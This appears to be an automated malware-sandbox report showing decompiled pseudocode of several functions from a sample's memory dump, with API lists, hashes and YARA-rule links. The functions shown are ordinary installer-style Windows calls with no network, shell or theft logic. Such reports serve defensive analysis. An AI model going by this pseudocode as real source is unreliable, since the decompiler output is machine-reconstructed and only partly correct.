                                                                    • Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
                                                                    • Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                                    • Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006A5D88, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006A5D88() {
				long _v8;
				void _v12;
				void* _v16;
				void* _t16;
				HANDLE* _t17;

				_t17 =  &_v12;
				_t16 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8, _t17) != 0) {
					_v12 = 0;
					if(GetTokenInformation(_v16, 0x12,  &_v12, 4,  &_v8) != 0) {
						_t16 = _v16;
					}
					CloseHandle( *_t17);
				}
				return _t16;
			}








                                                                    0x006a5d89
                                                                    0x006a5d8c
                                                                    0x006a5d9e
                                                                    0x006a5da2
                                                                    0x006a5dc0
                                                                    0x006a5dc2
                                                                    0x006a5dc2
                                                                    0x006a5dca
                                                                    0x006a5dca
                                                                    0x006a5dd5

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
                                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                    • String ID:
                                                                    • API String ID: 215268677-0
                                                                    • Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                                    • Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
                                                                    • Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                                    • Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F5548, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004F5548() {
				signed char _v28;
				void* _t4;
				signed int _t8;
				struct HDC__* _t9;
				struct tagTEXTMETRICW* _t10;

				_t8 = 1;
				_t9 = GetDC(0);
				if(_t9 != 0) {
					_t4 =  *0x6d54b0; // 0x58a00b4
					if(SelectObject(_t9, _t4) != 0 && GetTextMetricsW(_t9, _t10) != 0) {
						_t8 = _v28 & 0x000000ff;
					}
					ReleaseDC(0, _t9);
				}
				return _t8;
			}








                                                                    0x004f554d
                                                                    0x004f5556
                                                                    0x004f555a
                                                                    0x004f555c
                                                                    0x004f556a
                                                                    0x004f5577
                                                                    0x004f5577
                                                                    0x004f557f
                                                                    0x004f557f
                                                                    0x004f558b

                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 004F5551
                                                                    • SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
                                                                    • GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
                                                                    • ReleaseDC.USER32 ref: 004F557F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                    • String ID:
                                                                    • API String ID: 2013942131-0
                                                                    • Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                                    • Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
                                                                    • Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                                    • Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B72C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E006B72C2(void* __ecx, void* __esi, void* __fp0) {
				void* _t21;
				intOrPtr* _t27;
				intOrPtr* _t33;
				void* _t41;
				intOrPtr _t43;
				char _t46;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t59;
				void* _t60;
				void* _t61;
				intOrPtr _t62;
				void* _t67;

				_t67 = __fp0;
				_t60 = __esi;
				_t47 = __ecx;
				if(( *(_t61 - 9) & 0x00000001) != 0) {
					L3:
					_t46 = 1;
				} else {
					_t64 =  *(_t61 - 9) & 0x00000040;
					if(( *(_t61 - 9) & 0x00000040) != 0) {
						goto L3;
					} else {
						_t46 = 0;
					}
				}
				_t21 = E006A5DD8(_t46, _t47, 0, _t64, _t67);
				_t65 = _t21;
				if(_t21 != 0) {
					_t27 =  *0x6cdec4; // 0x6d579c
					SetWindowPos( *( *_t27 + 0x188), 0, 0, 0, 0, 0, 0x97);
					_push(_t61);
					_push(0x6b736d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t62;
					_t33 =  *0x6cdec4; // 0x6d579c
					 *((intOrPtr*)(_t61 - 0x18)) =  *((intOrPtr*)( *_t33 + 0x188));
					 *((char*)(_t61 - 0x14)) = 0;
					E004244F8(L"/INITPROCWND=$%x ", 0, _t61 - 0x18, _t61 - 0x10);
					_push(_t61 - 0x10);
					E005C6E90(_t61 - 0x1c, _t46, _t60, _t65);
					_pop(_t41);
					E0040B470(_t41,  *((intOrPtr*)(_t61 - 0x1c)));
					_t43 =  *0x6d68d0; // 0x0
					E006A60E8(_t43, _t46, 0x6cd884,  *((intOrPtr*)(_t61 - 0x10)), _t60, _t65, _t67);
					_pop(_t59);
					 *[fs:eax] = _t59;
					 *((char*)(_t61 - 1)) = 1;
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E006B73CE);
				E0040A1C8(_t61 - 0x1c);
				return E0040A1C8(_t61 - 0x10);
			}
















                                                                    0x006b72c2
                                                                    0x006b72c2
                                                                    0x006b72c2
                                                                    0x006b72c6
                                                                    0x006b72d2
                                                                    0x006b72d2
                                                                    0x006b72c8
                                                                    0x006b72c8
                                                                    0x006b72cc
                                                                    0x00000000
                                                                    0x006b72ce
                                                                    0x006b72ce
                                                                    0x006b72ce
                                                                    0x006b72cc
                                                                    0x006b72d8
                                                                    0x006b72dd
                                                                    0x006b72df
                                                                    0x006b72f4
                                                                    0x006b7302
                                                                    0x006b7309
                                                                    0x006b730a
                                                                    0x006b730f
                                                                    0x006b7312
                                                                    0x006b7319
                                                                    0x006b7326
                                                                    0x006b7329
                                                                    0x006b7337
                                                                    0x006b733f
                                                                    0x006b7343
                                                                    0x006b734b
                                                                    0x006b734c
                                                                    0x006b7359
                                                                    0x006b735e
                                                                    0x006b7365
                                                                    0x006b7368
                                                                    0x006b73a5
                                                                    0x006b73a5
                                                                    0x006b73ab
                                                                    0x006b73ae
                                                                    0x006b73b1
                                                                    0x006b73b9
                                                                    0x006b73c6

                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window
                                                                    • String ID: /INITPROCWND=$%x $@
                                                                    • API String ID: 2353593579-4169826103
                                                                    • Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                                    • Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
                                                                    • Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                                    • Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00435608, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 66%
                                                                    			E00435608(signed short* __eax, void* __ebx, void* __edx) {
				signed short* _v8;
				char _v16;
				char _v24;
				void* _t23;
				intOrPtr _t31;
				void* _t32;
				void* _t34;

				_t23 = __edx;
				_v8 = __eax;
				_t2 =  &_v24; // 0x435946
				L0042F03C();
				 *[fs:eax] = _t34 + 0xffffffec;
				_t4 =  &_v24; // 0x435946
				E00430ED4( *((intOrPtr*)( *((intOrPtr*)( *0x6cdffc))))(_v8, 0x400, 0, 8,  *[fs:eax], 0x435674, _t34, _t2, __ebx, _t32), 8,  *_v8 & 0x0000ffff);
				_t6 =  &_v16; // 0x43596b
				E0040A61C(_t23,  *_t6);
				_t31 = _t4;
				 *[fs:eax] = _t31;
				_push(E0043567B);
				_t7 =  &_v24; // 0x435946
				return L00431164(_t7);
			}










                                                                    0x0043560f
                                                                    0x00435611
                                                                    0x00435614
                                                                    0x00435618
                                                                    0x00435628
                                                                    0x00435638
                                                                    0x0043564f
                                                                    0x00435656
                                                                    0x00435659
                                                                    0x00435660
                                                                    0x00435663
                                                                    0x00435666
                                                                    0x0043566b
                                                                    0x00435673

                                                                    APIs
                                                                    • VariantInit.OLEAUT32(FYC), ref: 00435618
                                                                      • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocInitStringVariant
                                                                    • String ID: FYC$kYC
                                                                    • API String ID: 4010818693-1629163012
                                                                    • Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                                    • Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
                                                                    • Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                                    • Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8CAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E006B8CAC(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t1;
				int _t9;
				void* _t12;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t18;
				intOrPtr _t20;

				_t15 = __edx;
				if( *0x6d68e5 != 0) {
					E00616130(L"Detected restart. Removing temporary directory.", _t12, _t17, _t18);
					_push(0x6b8ce7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t20;
					E006ACE20();
					E006ACB10(_t12, _t15, _t17, _t18);
					_pop(_t16);
					 *[fs:eax] = _t16;
					E00615560();
					_t9 =  *0x6cd884; // 0x1
					return TerminateProcess(GetCurrentProcess(), _t9);
				}
				return _t1;
			}















                                                                    0x006b8cac
                                                                    0x006b8cb9
                                                                    0x006b8cc0
                                                                    0x006b8cc8
                                                                    0x006b8ccd
                                                                    0x006b8cd0
                                                                    0x006b8cd3
                                                                    0x006b8cd8
                                                                    0x006b8cdf
                                                                    0x006b8ce2
                                                                    0x006b8cf6
                                                                    0x006b8cfb
                                                                    0x00000000
                                                                    0x006b8d07
                                                                    0x006b8d10

                                                                    APIs
                                                                      • Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                                      • Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58
                                                                      • Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F
                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
                                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07
                                                                    Strings
                                                                    • Detected restart. Removing temporary directory., xrefs: 006B8CBB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                    • String ID: Detected restart. Removing temporary directory.
                                                                    • API String ID: 1717587489-3199836293
                                                                    • Opcode ID: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                                    • Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
                                                                    • Opcode Fuzzy Hash: ba331b089060afb977d72fce05483963aa44ed152fcb3281d86fb57da4e379c7
                                                                    • Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C86E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 47%
                                                                    			E005C86E0(void* __eax, void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				void* _t3;
				void* _t7;
				void* _t12;
				intOrPtr* _t13;

				_t8 = __ecx;
				_push(__ecx);
				_t7 = __edx;
				_t12 = __eax;
				if( *0x6d57f0 == 0) {
					 *0x6d57f4 = E00414020(_t7, _t12, GetModuleHandleW(L"user32.dll"), L"ChangeWindowMessageFilterEx");
					 *_t13 = 0x6d57f0;
					asm("lock xchg [edx], eax");
				}
				if( *0x6d57f4 == 0) {
					_t3 = E005C8644(_t7, _t8);
				} else {
					_t3 =  *0x6d57f4(_t12, _t7, 1, 0);
				}
				return _t3;
			}









                                                                    0x005c86e0
                                                                    0x005c86e2
                                                                    0x005c86e3
                                                                    0x005c86e5
                                                                    0x005c86ee
                                                                    0x005c8705
                                                                    0x005c870a
                                                                    0x005c8719
                                                                    0x005c8719
                                                                    0x005c8723
                                                                    0x005c8735
                                                                    0x005c8725
                                                                    0x005c872b
                                                                    0x005c872b
                                                                    0x005c873d

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                      • Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc
                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                    • API String ID: 1883125708-2676053874
                                                                    • Opcode ID: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                                    • Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
                                                                    • Opcode Fuzzy Hash: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
                                                                    • Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C8790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 62%
                                                                    			E005C8790(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* _t9;
				void* _t11;
				intOrPtr* _t12;
				void* _t14;
				void* _t15;

				_t14 = __edx;
				_t15 = __eax;
				E005C8820(__eax, __eflags);
				_t12 = E00414020(_t11, _t15, GetModuleHandleW(L"user32.dll"), L"ShutdownBlockReasonCreate");
				if(_t12 == 0) {
					__eflags = 0;
					return 0;
				}
				_t9 =  *_t12(_t15, E0040B278(_t14));
				asm("sbb eax, eax");
				return _t9 + 1;
			}










                                                                    0x005c8793
                                                                    0x005c8795
                                                                    0x005c8799
                                                                    0x005c87b3
                                                                    0x005c87b7
                                                                    0x005c87cc
                                                                    0x00000000
                                                                    0x005c87cc
                                                                    0x005c87c2
                                                                    0x005c87c7
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc
                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                    • API String ID: 1883125708-2866557904
                                                                    • Opcode ID: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                                    • Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
                                                                    • Opcode Fuzzy Hash: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
                                                                    • Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C7488, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E005C7488(void* __eax, void* __esi, void* __ebp, void* __eflags) {
				char _v536;
				void* __ebx;
				intOrPtr* _t6;
				void* _t9;
				void* _t15;

				_t9 = __eax;
				E0040A1C8(__eax);
				_t6 = E00414020(_t9, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetSystemWow64DirectoryW");
				if(_t6 != 0) {
					_t6 =  *_t6( &_v536, 0x105);
					if(_t6 > 0 && _t6 < 0x105) {
						return E0040B318(_t9, 0x105, _t15);
					}
				}
				return _t6;
			}








                                                                    0x005c748f
                                                                    0x005c7493
                                                                    0x005c74a8
                                                                    0x005c74af
                                                                    0x005c74bb
                                                                    0x005c74bf
                                                                    0x00000000
                                                                    0x005c74d1
                                                                    0x005c74bf
                                                                    0x005c74dd

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
